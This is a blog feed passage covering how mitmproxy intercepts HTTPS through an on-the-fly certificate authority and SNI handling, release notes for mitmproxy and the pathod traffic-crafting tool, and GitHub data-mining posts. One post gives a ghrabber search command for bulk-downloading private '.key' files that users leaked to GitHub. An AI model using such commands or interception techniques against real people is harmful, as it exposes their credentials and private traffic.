I proceed\nby example, starting with the simplest unencrypted explicit proxying, and\nworking up to the most complicated interaction - transparent proxying of\nSSL-protected traffic<sup class=\"footnote-reference\"><a href=\"#ssl\">1<\/a><\/sup> in the presence of\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Server_Name_Indication\">SNI<\/a>.<\/p>\n<h2 id=\"explicit-http\">Explicit HTTP<\/h2>\n<p>Configuring the client to use mitmproxy as an explicit proxy is the simplest and\nmost reliable way to intercept traffic. The proxy protocol is codified in the\n<a rel=\"external\" href=\"http:\/\/www.ietf.org\/rfc\/rfc2068.txt\">HTTP RFC<\/a>, so the behaviour of both the\nclient and the server is well defined, and usually reliable. In the simplest\npossible interaction with mitmproxy, a client connects directly to the proxy and\nmakes a request that looks like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>GET http:\/\/example.com\/index.html HTTP\/1.1<\/span><\/span><\/code><\/pre>\n<p>This is a proxy GET request - an extended form of the vanilla HTTP GET request\nthat includes a scheme and host specification, and it includes all the\ninformation mitmproxy needs to relay the request upstream.<\/p>\n<div class=\"media\">\n    <a href=\"explicit.png\">\n        <img src=\"explicit.png\"  \/>\n    <\/a>\n\n    \n<\/div><table class=\"table\">\n    <tbody>\n        <tr>\n            <td><b>1<\/b><\/td>\n            <td>The client connects to the proxy and makes a request.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>2<\/b><\/td>\n            <td>Mitmproxy connects to the upstream server and simply forwards\n            the request on.<\/td>\n        <\/tr>\n    <\/tbody>\n<\/table>\n<h2 id=\"explicit-https\">Explicit HTTPS<\/h2>\n<p>The process for an explicitly proxied HTTPS connection is quite different. 
The\nclient connects to the proxy and makes a request that looks like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>CONNECT example.com:443 HTTP\/1.1<\/span><\/span><\/code><\/pre>\n<p>A conventional proxy can neither view nor manipulate an SSL-encrypted data\nstream, so a CONNECT request simply asks the proxy to open a pipe between the\nclient and server. The proxy here is just a facilitator - it blindly forwards\ndata in both directions without knowing anything about the contents. The\nnegotiation of the SSL connection happens over this pipe, and the subsequent\nflow of requests and responses is completely opaque to the proxy.<\/p>\n<h3 id=\"the-mitm-in-mitmproxy\">The MITM in mitmproxy<\/h3>\n<p>This is where mitmproxy's fundamental trick comes into play. The MITM in its\nname stands for Man-In-The-Middle - a reference to the process we use to\nintercept and interfere with these theoretically opaque data streams. The basic\nidea is to pretend to be the server to the client, and pretend to be the client\nto the server, while we sit in the middle decoding traffic from both sides. The\ntricky part is that the <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Certificate_authority\">Certificate\nAuthority<\/a> system is\ndesigned to prevent exactly this attack, by allowing a trusted third-party to\ncryptographically sign a server's SSL certificates to verify that they are\nlegit. If this signature doesn't match or is from a non-trusted party, a secure\nclient will simply drop the connection and refuse to proceed. Despite the many\nshortcomings of the CA system as it exists today, this is usually fatal to\nattempts to MITM an SSL connection for analysis. Our answer to this conundrum\nis to become a trusted Certificate Authority ourselves. Mitmproxy includes a\nfull CA implementation that generates interception certificates on the fly. 
To\nget the client to trust these certificates, we <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/ssl.html\">register mitmproxy as a trusted\nCA with the device manually<\/a>.<\/p>\n<h3 id=\"complication-1-what-s-the-remote-hostname\">Complication 1: What's the remote hostname?<\/h3>\n<p>To proceed with this plan, we need to know the domain name to use in the\ninterception certificate - the client will verify that the certificate is for\nthe domain it's connecting to, and abort if this is not the case. At first\nblush, it seems that the CONNECT request above gives us all we need - in this\nexample, both of these values are \"example.com\".  But what if the client had\ninitiated the connection as follows:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>CONNECT 10.1.1.1:443 HTTP\/1.1<\/span><\/span><\/code><\/pre>\n<p>Using the IP address is perfectly legitimate because it gives us enough\ninformation to initiate the pipe, even though it doesn't reveal the remote\nhostname.<\/p>\n<p>Mitmproxy has a cunning mechanism that smooths this over - <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/features\/upstreamcerts.html\">upstream\ncertificate sniffing<\/a>. As\nsoon as we see the CONNECT request, we pause the client part of the\nconversation, and initiate a simultaneous connection to the server. We complete\nthe SSL handshake with the server, and inspect the certificates it used. Now,\nwe use the Common Name in the upstream SSL certificates to generate the dummy\ncertificate for the client. Voila, we have the correct hostname to present to\nthe client, even if it was never specified.<\/p>\n<h3 id=\"complication-2-subject-alternative-name\">Complication 2: Subject Alternative Name<\/h3>\n<p>Enter the next complication. Sometimes, the certificate Common Name is not, in\nfact, the hostname that the client is connecting to. 
This is because of the\noptional <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/SubjectAltName\">Subject Alternative\nName<\/a> field in the SSL certificate\nthat allows an arbitrary number of alternative domains to be specified. If the\nexpected domain matches any of these, the client will proceed, even though the\ndomain doesn't match the certificate Common Name. The answer here is simple:\nwhen we extract the CN from the upstream cert, we also extract the SANs, and add\nthem to the generated dummy certificate.<\/p>\n<h3 id=\"complication-3-server-name-indication\">Complication 3: Server Name Indication<\/h3>\n<p>One of the big limitations of vanilla SSL is that each certificate requires its\nown IP address. This means that you couldn't do virtual hosting where multiple\ndomains with independent certificates share the same IP address. In a world\nwith a rapidly shrinking IPv4 address pool this is a problem, and we have a\nsolution in the form of the <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Server_Name_Indication\">Server Name\nIndication<\/a> extension to\nthe SSL and TLS protocols. This lets the client specify the remote server name\nat the start of the SSL handshake, which then lets the server select the right\ncertificate to complete the process.<\/p>\n<p>SNI breaks our upstream certificate sniffing process, because when we connect\nwithout using SNI, we get served a default certificate that may have nothing to\ndo with the certificate expected by the client. The solution is another tricky\ncomplication to the client connection process. After the client connects, we\nallow the SSL handshake to continue until just <em>after<\/em> the SNI value has been\npassed to us. Now we can pause the conversation, and initiate an upstream\nconnection using the correct SNI value, which then serves us the correct\nupstream certificate, from which we can extract the expected CN and SANs.<\/p>\n<p>There's another wrinkle here. 
Due to a limitation of the SSL library mitmproxy\nuses, we can't detect that a connection <em>hasn't<\/em> sent an SNI request until it's\ntoo late for upstream certificate sniffing. In practice, we therefore make a\nvanilla SSL connection upstream to sniff non-SNI certificates, and then discard\nthe connection if the client sends an SNI notification. If you're watching your\ntraffic with a packet sniffer, you'll see two connections to the server when an\nSNI request is made, the first of which is immediately closed after the SSL\nhandshake. Luckily, this is almost never an issue in practice.<\/p>\n<h3 id=\"putting-it-all-together\">Putting it all together<\/h3>\n<p>Let's put all of this together into the complete explicitly proxied HTTPS flow.<\/p>\n<div class=\"media\">\n    <a href=\"explicit_https.png\">\n        <img src=\"explicit_https.png\"  \/>\n    <\/a>\n\n    \n<\/div><table class=\"table\">\n    <tbody>\n        <tr>\n            <td><b>1<\/b><\/td>\n            <td>The client makes a connection to mitmproxy, and issues an HTTP\n            CONNECT request.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>2<\/b><\/td>\n            <td>Mitmproxy responds with a 200 Connection Established, as if it\n            has set up the CONNECT pipe.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>3<\/b><\/td>\n            <td>The client believes it's talking to the remote server, and\n            initiates the SSL connection. 
It uses SNI to indicate the hostname\n            it is connecting to.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>4<\/b><\/td>\n            <td>Mitmproxy connects to the server, and establishes an SSL\n            connection using the SNI hostname indicated by the client.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>5<\/b><\/td>\n            <td>The server responds with the matching SSL certificate, which\n            contains the CN and SAN values needed to generate the interception\n            certificate.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>6<\/b><\/td>\n            <td>Mitmproxy generates the interception cert, and continues the\n            client SSL handshake paused in step 3.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>7<\/b><\/td>\n            <td>The client sends the request over the established SSL\n            connection.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>8<\/b><\/td>\n            <td>Mitmproxy passes the request on to the server over the SSL\n            connection initiated in step 4.<\/td>\n        <\/tr>\n    <\/tbody>\n<\/table>\n<h2 id=\"transparent-http\">Transparent HTTP<\/h2>\n<p>When a transparent proxy is used, the HTTP\/S connection is redirected into a\nproxy at the network layer, without any client configuration being required.\nThis makes transparent proxying ideal for those situations where you can't\nchange client behaviour - proxy-oblivious Android applications being a common\nexample.<\/p>\n<p>To achieve this, we need to introduce two extra components. The first is a\nredirection mechanism that transparently reroutes a TCP connection destined for\na server on the Internet to a listening proxy server. This usually takes the\nform of a firewall on the same host as the proxy server -\n<a rel=\"external\" href=\"http:\/\/www.netfilter.org\/\">iptables<\/a> on Linux or\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/PF_(firewall)\">pf<\/a> on OSX. 
Once the client has\ninitiated the connection, it makes a vanilla HTTP request, which might look\nsomething like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>GET \/index.html HTTP\/1.1<\/span><\/span><\/code><\/pre>\n<p>Note that this request differs from the explicit proxy variation, in that it\nomits the scheme and hostname. How, then, do we know which upstream host to\nforward the request to? The routing mechanism that has performed the\nredirection keeps track of the original destination for us.  Each routing\nmechanism has a different way of exposing this data, so this introduces the\nsecond component required for working transparent proxying: a host module that\nknows how to retrieve the original destination address from the router. In\nmitmproxy, this takes the form of a built-in set of\n<a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/mitmproxy\/tree\/master\/libmproxy\/platform\">modules<\/a>\nthat know how to talk to each platform's redirection mechanism.  Once we have\nthis information, the process is fairly straightforward.<\/p>\n<div class=\"media\">\n    <a href=\"transparent.png\">\n        <img src=\"transparent.png\"  \/>\n    <\/a>\n\n    \n<\/div><table class=\"table\">\n    <tbody>\n        <tr>\n            <td><b>1<\/b><\/td>\n            <td>The client makes a connection to the server.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>2<\/b><\/td>\n            <td>The router redirects the connection to mitmproxy, which is\n            typically listening on a local port of the same host. Mitmproxy\n            then consults the routing mechanism to establish what the original\n            destination was.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>3<\/b><\/td>\n            <td>Now, we simply read the client's request...<\/td>\n        <\/tr>\n        <tr>\n            <td><b>4<\/b><\/td>\n            <td>... 
and forward it upstream.<\/td>\n        <\/tr>\n    <\/tbody>\n<\/table>\n<h2 id=\"transparent-https\">Transparent HTTPS<\/h2>\n<p>The first step is to determine whether we should treat an incoming connection\nas HTTPS. The mechanism for doing this is simple - we use the routing mechanism\nto find out what the original destination port is. By default, we treat all\ntraffic destined for ports 443 and 8443 as SSL.<\/p>\n<p>From here, the process is a merger of the methods we've described for\ntransparently proxying HTTP, and explicitly proxying HTTPS. We use the routing\nmechanism to establish the upstream server address, and then proceed as for\nexplicit HTTPS connections to establish the CN and SANs, and cope with SNI.<\/p>\n<div class=\"media\">\n    <a href=\"transparent_https.png\">\n        <img src=\"transparent_https.png\"  \/>\n    <\/a>\n\n    \n<\/div><table class=\"table\">\n    <tbody>\n        <tr>\n            <td><b>1<\/b><\/td>\n            <td>The client makes a connection to the server.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>2<\/b><\/td>\n            <td>The router redirects the connection to mitmproxy, which is\n            typically listening on a local port of the same host. Mitmproxy\n            then consults the routing mechanism to establish what the original\n            destination was.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>3<\/b><\/td>\n            <td>The client believes it's talking to the remote server, and\n            initiates the SSL connection. 
It uses SNI to indicate the hostname\n            it is connecting to.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>4<\/b><\/td>\n            <td>Mitmproxy connects to the server, and establishes an SSL\n            connection using the SNI hostname indicated by the client.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>5<\/b><\/td>\n            <td>The server responds with the matching SSL certificate, which\n            contains the CN and SAN values needed to generate the interception\n            certificate.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>6<\/b><\/td>\n            <td>Mitmproxy generates the interception cert, and continues the\n            client SSL handshake paused in step 3.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>7<\/b><\/td>\n            <td>The client sends the request over the established SSL\n            connection.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>8<\/b><\/td>\n            <td>Mitmproxy passes the request on to the server over the SSL\n            connection initiated in step 4.<\/td>\n        <\/tr>\n    <\/tbody>\n<\/table>\n<div class=\"footnote-definition\" id=\"ssl\"><sup class=\"footnote-definition-label\">1<\/sup>\n<p>I use \"SSL\" to refer to both SSL and TLS in the generic sense, unless otherwise specified.<\/p>\n<\/div>\n"},{"title":"pathod 0.9","published":"2013-05-16T00:00:00+00:00","updated":"2013-05-16T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/pathod\/announce0_9\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/pathod\/announce0_9\/","content":"<p>I've just released <a rel=\"external\" href=\"http:\/\/pathod.net\">pathod 0.9<\/a>, my toolset for crafting\nmalicious and interesting HTTP traffic. Apart from the usual range of stability\nimprovements and bugfixes, this release introduces a major new set of features:\nproxy support. 
<a rel=\"external\" href=\"http:\/\/pathod.net\/docs\/pathoc\">Pathoc<\/a>, the client, has sprouted\nsupport for vanilla proxy connections, and is also able to tunnel through\nproxies using CONNECT. <a rel=\"external\" href=\"http:\/\/pathod.net\/docs\/pathod\">Pathod<\/a>, the server, will\nnow respond to proxy requests as well as straight HTTP, and will treat CONNECT\nrequests as SSL with on-the-fly generation of dummy certificates.<\/p>\n<p>The Pathod changes in particular open a whole new range of possibilities for\nfuzzing and other mischief. Any client with proxy support can be directed at\nPathod, which can then impersonate the upstream server and return the creatively\nmalicious response of your choice.<\/p>\n<p>There have also been some organizational changes. This is the first release\nbased on <a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/netlib\">netlib<\/a>, the gonzo networking\nlibrary pathod now shares with <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a>. Over the next\nwhile, pathod and mitmproxy will move closer together. As a sign of this, the\nmajor version numbers between these projects are now synchronized.<\/p>\n"},{"title":"mitmproxy 0.9","published":"2013-05-15T00:00:00+00:00","updated":"2013-05-15T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_9\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_9\/","content":"<div class=\"media\">\n    <a href=\"mitmproxy_0_9.png\">\n        <img src=\"mitmproxy_0_9.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I'm happy to announce the release of <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy 0.9<\/a>. This\nis a major release, with huge improvements to mitmproxy pretty much across the\nboard. So much has happened in the year since the last release that it's\ndifficult to pick out the headlines. 
Mitmproxy is now faster, more scalable, and\nworks in more tricky corner cases than ever before. Full transparent mode\nsupport has landed for both Linux and OSX. Content decoding is much nicer, with\na slew of new targets like\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Action_Message_Format\">AMF<\/a> and <a rel=\"external\" href=\"https:\/\/code.google.com\/p\/protobuf\/\">Protocol\nBuffers<\/a>. We now have a WSGI container that\nallows you to host web apps right in the proxy. In addition to this, there is a\nmyriad of new features, bugfixes and other small improvements.<\/p>\n<p>There are also changes afoot in the project itself. As a first step, I've moved\nmitmproxy from the GPLv3 to an MIT license. I hope that this will make it easier\nfor people to use the project in more contexts. Keep an eye out for more changes\nalong these lines soon, geared to broadening participation in the project.<\/p>\n<h2 id=\"changelog\">Changelog<\/h2>\n<ul>\n<li>Upstream certs mode is now the default.<\/li>\n<li>Add a WSGI container that lets you host in-proxy web applications.<\/li>\n<li>Full transparent proxy support for Linux and OSX.<\/li>\n<li>Introduce netlib, a common codebase for <a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/netlib\">mitmproxy and\npathod<\/a>.<\/li>\n<li>Full support for SNI.<\/li>\n<li>Color palettes for mitmproxy, tailored for light and dark terminal\nbackgrounds.<\/li>\n<li>Stream flows to file as responses arrive with the \"W\" shortcut in\nmitmproxy.<\/li>\n<li>Extend the filter language, including ~d domain match operator, ~a to\nmatch asset flows (js, images, css).<\/li>\n<li>Follow mode in mitmproxy (\"F\" shortcut) to \"tail\" flows as they arrive.<\/li>\n<li>--dummy-certs option to specify and preserve the dummy certificate\ndirectory.<\/li>\n<li>Server replay from the current captured buffer.<\/li>\n<li>Huge improvements in content views. 
We now have viewers for AMF, HTML,\nJSON, Javascript, images, XML, URL-encoded forms, as well as hexadecimal\nand raw views.<\/li>\n<li>Add Set Headers, analogous to replacement hooks. Defines headers that are set\non flows, based on a matching pattern.<\/li>\n<li>A graphical editor for path components in mitmproxy.<\/li>\n<li>A small set of standard user-agent strings, which can be used easily in\nthe header editor.<\/li>\n<li>Proxy authentication to limit access to mitmproxy<\/li>\n<\/ul>\n"},{"title":"Google, destroyer of ecosystems","published":"2013-03-14T00:00:00+00:00","updated":"2013-03-14T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/socialmedia\/rip-google-reader\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/socialmedia\/rip-google-reader\/","content":"<p>Google has finally shut down a service I actually care about - <a rel=\"external\" href=\"http:\/\/googlereader.blogspot.co.nz\/2013\/03\/powering-down-google-reader.html\">Google Reader\nwill die a graceless, undignified death on July 1,\n2013<\/a>.\nThe only way Google could inconvenience me more would be to shut down search\nitself, and yet - I'm not angry that Google is shutting Reader down. I'm furious\nthat they ever entered the RSS game at all. Consider this quote from a\nTechCrunch <a rel=\"external\" href=\"http:\/\/techcrunch.com\/2006\/01\/10\/searchfox-to-shut-down\/\">article in January\n2006<\/a>. Here, Michael\nArrington ends an article about the shutdown of a feed reader service with a\nstatement that seems truly bizarre today:<\/p>\n<blockquote>\n<p>The RSS reader space is becoming hyper competitive, with dozens of different\nchoices for readers.<\/p>\n<\/blockquote>\n<p>A hyper competitive space with dozens of choices? Reader made its first public\nappearance a couple of months before this, in October 2005. 
I remember this\nperiod well - it was a time of immense excitement, when RSS seemed to be the\nfuture, the news ecosystem was vibrant, and this thing called the blogosphere,\nfueled by peer subscription, was doubling in size every six months. It was into\nthis magic garden that Google wandered, like a giant toddler leaving destruction\nin its wake. Reader was undeniably a good product, but its best quality was\nalso its worst: it was free. Subsidized by Google's immense search profits, it\nnever had to earn its keep, and its competitors started to die. Over time, the\n\"hyper competitive\" RSS reader market turned into a monoculture. Today, on the\neve of its shutdown, RSS more or less means \"Google Reader\" to a large fraction\nof readers, to the extent where even the best feed readers on iOS are just\nGoogle Reader clients<sup class=\"footnote-reference\"><a href=\"#1\">1<\/a><\/sup>.<\/p>\n<p>The sudden shock of Reader's closure will harm a news ecosystem that I <a href=\"https:\/\/corte.si\/posts\/socialmedia\/trouble-with-social-news\/\">already\nbelieve to be deeply ill<\/a>.\nGoogle Reader is not just a core part of my information diet - it's also the\nmost direct channel I have to readers of this blog. As of today, the Reader\nsubscriber count for <a rel=\"external\" href=\"http:\/\/corte.si\">corte.si<\/a> stands at about 3 times the\ntotal number of other subscribers combined. Some of these readers will migrate\nto other services and stay in touch, but many will inevitably abandon the idea\nof direct subscription to blogs entirely. In the next few months, tens of\nthousands of small blogs will lose direct contact with a large fraction of their\nreaders.<\/p>\n<p>The truth is this: Google destroyed the RSS feed reader ecosystem with a\nsubsidized product, stifling its competitors and killing innovation. It then\nneglected Google Reader itself for years, after it had effectively become the\nonly player. 
Today it does further damage by buggering up the already\nbeleaguered links between publishers and readers. It would have been better for\nthe Internet if Reader had never been at all.<\/p>\n<div class=\"footnote-definition\" id=\"1\"><sup class=\"footnote-definition-label\">1<\/sup>\n<p>Yes, I'm aware that there are a few hardy outliers still playing in this\nplace. My own logs show that their reach is insignificant, though, and when I\ntried to shift my subscriptions about a year ago, there was nothing as good as\nReader itself. Once <a rel=\"external\" href=\"http:\/\/www.newsblur.com\">NewsBlur's<\/a> servers have\nrecovered, I definitely plan to give it another shot.<\/p>\n<\/div>\n"},{"title":"Things I found on GitHub: aspell custom dictionary entries","published":"2013-02-26T00:00:00+00:00","updated":"2013-02-26T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/hacks\/github-spellingdicts\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/hacks\/github-spellingdicts\/","content":"<p>I've been doing a series of posts looking at data gathered with\n<a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/ghrabber\">ghrabber<\/a>, a simple tool I wrote that lets\nyou grab files matching a search specification from GitHub. Last week, I looked\nat <a href=\"https:\/\/corte.si\/posts\/hacks\/github-shhistory\/\">shell history<\/a> in the broad, and\nthen specifically at <a href=\"https:\/\/corte.si\/posts\/hacks\/github-pipechains\/\">pipe chains<\/a>.\nToday, I move on to something different - custom <a rel=\"external\" href=\"http:\/\/aspell.net\/\">aspell<\/a>\ndictionaries. When aspell finds a word it doesn't recognize, the user is\nprompted to correct it, ignore it, or add it to a custom dictionary so that it\nwill be recognized as correct in future. These words are written to the user's\ncustom dictionary - a file named <strong>.aspell_en_pw<\/strong> that lives in the user's\nhome directory. 
It turns out that 30 people have checked aspell dictionaries\ninto GitHub, containing a total of 9501 custom words. The chart below shows the\ntop 50 words, with the X-axis showing the percentage of files the word appeared\nin.<\/p>\n<div class=\"media\">\n    <a href=\"aspell.png\">\n        <img src=\"aspell.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>There were a few requests for the raw data behind the previous two posts, so\nthis time round you can also <a href=\"https:\/\/corte.si\/posts\/hacks\/github-spellingdicts\/.\/aspell-all.csv\">download a CSV file<\/a>\nwith the occurrence totals for each word in the dataset.<\/p>\n"},{"title":"Things I found on GitHub: pipe chains","published":"2013-02-22T00:00:00+00:00","updated":"2013-02-22T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/hacks\/github-pipechains\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/hacks\/github-pipechains\/","content":"<p>Earlier this week I published <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/ghrabber\">ghrabber<\/a>, a\nsimple tool that lets you grab files matching an arbitrary search specification\nfrom GitHub. I used ghrabber to retrieve all the bash_history and zsh_history\nfiles accidentally checked in to repos, and took <a rel=\"external\" href=\"http:\/\/corte.si\/posts\/hacks\/github-shhistory\/index.html\">a light look at the dataset\nwith some simple\ngraphs<\/a>. In total, I\nobtained 234 shell history files with 165k individual command entries. This is a\nvery rare opportunity to \"shoulder-surf\", to actually see what people <em>do<\/em> at\nthe command prompt, and perhaps get some insights into how to improve things.<\/p>\n<p>Along those lines, today's post looks at pipe chains - that is, compound\ncommands that pipe the output of one command to another. The pipe operator lies\nat the core of the Unix command-line philosophy. 
The fact that we can easily\ncompose complex operations is the reason why we are able to write small tools\nthat \"do one thing well\" without losing generality. The shell history data on\nGitHub can give us some real data about what people do with composed commands,\nand how they do it.<\/p>\n<div class=\"media\">\n    <a href=\"pipechains.png\">\n        <img src=\"pipechains.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>It turns out that about 2% of all commands issued on the command-line use\npipes. The graph above shows the prevalence of the most common pipe chains - that\nis, what percentage of the users in my sample used each chain. There's a lot of\nfascinating stuff we can read straight from this image.<\/p>\n<p>Starting at the top, the first thing we notice is how widely used the <strong>ps |\ngrep<\/strong> chain is. About 17% of users in my sample used this chain - given the\ntype of data we have, the real-world prevalence would surely be higher still.\nI've just been extolling the virtues of small tools and composability, but in\nthis case practicality should beat purity. I suggest that everyone should have\na command-alias similar to this in their shell configuration:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">alias<\/span><span> pg<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #032F62;\">&quot;ps aux | grep&quot;<\/span><\/span><\/code><\/pre>\n<p>I've added this to my .zshrc today, and I've already used it twice.<\/p>\n<p>Next up, we have the <strong>ls | grep<\/strong> pipes. The vast majority of uses here could\nactually be accomplished using the shell's filename generation mechanism.  This\nranges from simple redundancies like grepping for file extensions, to\nperforming quite complex matching operations that could be done using the\nshell's advanced glob operations. 
I'm guilty of this myself - I rarely use\nfeatures like recursive globbing, expansions using character ranges, case\ninsensitive globbing, and so forth. I've brushed up on <a rel=\"external\" href=\"http:\/\/linux.die.net\/man\/1\/zshexpn\">filename expansion for\nmy chosen shell<\/a>, and perhaps you should\ntoo.<\/p>\n<p>The last thing I want to point out is a pattern that's genuinely dangerous -\n<strong>curl | bash<\/strong>, along with its cousins <strong>curl | sh<\/strong> and <strong>wget | sh<\/strong>.\nUnfortunately, this has become the recommended installation pattern for some\ntools - the vast majority of invocations here are for <a rel=\"external\" href=\"https:\/\/rvm.io\/\">RVM<\/a> and\n<a rel=\"external\" href=\"http:\/\/yeoman.io\/\">Yeoman<\/a>. I don't think it's a good idea to pipe anything\nfrom the web straight into a local shell, but the situation is made\nparticularly dire by the fact that almost half of these invocations are either\nover plain HTTP or explicitly turn certificate validation off.<\/p>\n<p>I'll stop here, although there are interesting things to say about nearly every\nentry in the graph above. Next week, I'll move on from the shell history\nsample, and look at some other juicy datasets extracted using ghrabber.<\/p>\n"},{"title":"Things I found on GitHub: shell history","published":"2013-02-19T00:00:00+00:00","updated":"2013-02-19T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/hacks\/github-shhistory\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/hacks\/github-shhistory\/","content":"<p>GitHub recently introduced hugely <a rel=\"external\" href=\"https:\/\/github.com\/blog\/1381-a-whole-new-code-search\">improved code\nsearch<\/a>, one of those rare\nmoments when a service I use adds a feature that directly and measurably\nimproves my life. 
Predictably, there was soon a\n<a rel=\"external\" href=\"http:\/\/www.webmonkey.com\/2013\/01\/users-scramble-as-github-search-exposes-passwords-security-details\/\">flurry<\/a>\n<a rel=\"external\" href=\"http:\/\/www.scmagazine.com.au\/News\/330152,passwords-ssh-keys-exposed-on-github.aspx\">of<\/a>\n<a rel=\"external\" href=\"http:\/\/arstechnica.com\/security\/2013\/01\/psa-dont-upload-your-important-passwords-to-github\/\">breathless<\/a>\nstories about the security implications. This shouldn't have been news to anyone - by now, it should be clear that better search in almost any context has\nsecurity or privacy implications, a law of the universe almost as solid as the\nsecond law of thermodynamics. We saw this with <a rel=\"external\" href=\"http:\/\/www.securityfocus.com\/news\/11417\">Google's own code\nsearch<\/a>, as well as <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Google_hacking\">Google\nproper<\/a>, Facebook's <a rel=\"external\" href=\"http:\/\/actualfacebookgraphsearches.tumblr.com\/\">Graph\nSearch<\/a> and even\n<a rel=\"external\" href=\"http:\/\/www.wired.com\/wiredenterprise\/2013\/02\/microsoft-bing-fights-botnets\/\">Bing<\/a>.\nA certain fraction of people will always make mistakes, and any sufficiently\npowerful search will allow bad guys to find and take advantage of the outliers.<\/p>\n<p>After the dust had settled a bit I started wondering what else we could do with\nGitHub's search - other than snookering schmucks who checked in their private\nkeys. I'm always enticed by data, and the combination of search and the ability\nto download raw checked-in files seemed like a promising avenue to explore. Let's\nsee what we can come up with.<\/p>\n<h2 id=\"ghrabber-grab-files-from-github\"><a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/ghrabber\">ghrabber<\/a> - grab files from GitHub<\/h2>\n<p>First, some tooling. 
I've just released ghrabber, a simple tool that lets you\ngrab all files matching a search specification from GitHub. Here, for instance,\nis an obvious wheeze - fetching all files with the extension \".key\":<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">.\/ghrabber.py<\/span><span style=\"color: #032F62;\"> &quot;extension:key&quot;<\/span><\/span><\/code><\/pre>\n<p>Downloaded files are saved locally to files named <strong>user.repository<\/strong>. Existing\nfiles with the same name are skipped, which means that you can reasonably\nefficiently stop and resume a ghrab.<\/p>\n<h2 id=\"shell-history-files\">Shell history files<\/h2>\n<p>I've been having a lot of fun exploring GitHub with ghrabber. I'll return to\nthis in future posts - today I'll start with a quick illustration of what can\nbe done. One type of difficult-to-find information that is sometimes checked in\nto repos is shell history. Two simple ghrabber commands for the two most\npopular shells are all we need:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">.\/ghrabber.py<\/span><span style=\"color: #032F62;\"> &quot;path:.bash_history&quot;<\/span><\/span><\/code><\/pre>\n<p>and<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">.\/ghrabber.py<\/span><span style=\"color: #032F62;\"> &quot;path:.zsh_history&quot;<\/span><\/span><\/code><\/pre>\n<p>After cleaning the data a bit, I had 234 history files varying in length from 1\nline to just over 10 thousand, containing a total of 165k entries. 
